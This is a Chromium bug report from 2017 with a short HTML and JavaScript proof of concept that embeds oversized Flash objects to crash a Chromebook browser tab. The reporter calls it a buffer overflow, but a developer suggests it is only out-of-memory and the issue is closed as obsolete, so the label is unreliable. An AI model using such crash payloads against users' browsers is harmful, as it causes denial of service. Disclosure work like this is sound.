POC OF A Buffer Overflow in the chromebook
Reported by
xbrit7@gmail.com,
Jan 25 2017
|
||
Issue description
UserAgent: Mozilla/5.0 (X11; CrOS x86_64 8872.76.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.105 Safari/537.36
Platform: Chrome All Versions
Steps to reproduce the problem:
<button onclick="testFunc()">Load</button><p>
<script>
function testFunc() {
var out= 4;
for(var i=0;i<out;i++){
var x =document.createElement("EMBED");
x.src= "textt.swf";
x.height= ("10000in");
x.width=("10000in");
document.body.appendChild(x);
}
}
</script>
What is the expected behavior?
BLack Screen/Restart Or Just Crash.
What went wrong?
Buffer Overflow in Flash/Chromebooks.
Crashed report ID: NO
How much crashed? Just one tab
Is it a problem with a plugin? N/A
Did this work before? No
Chrome version: 55.0.2883.105 Channel: stable
OS Version: 8872.76.0
Flash Version: Shockwave Flash 24.0 r0
,
Jan 27 2017
You are saying the renderer runs out of memory and crashes when requesting too large elements/plugins?
,
Apr 22 2017
Obsolete. |
||
►
Sign in to add a comment |
||
Comment 1 by dhadd...@chromium.org
, Jan 27 2017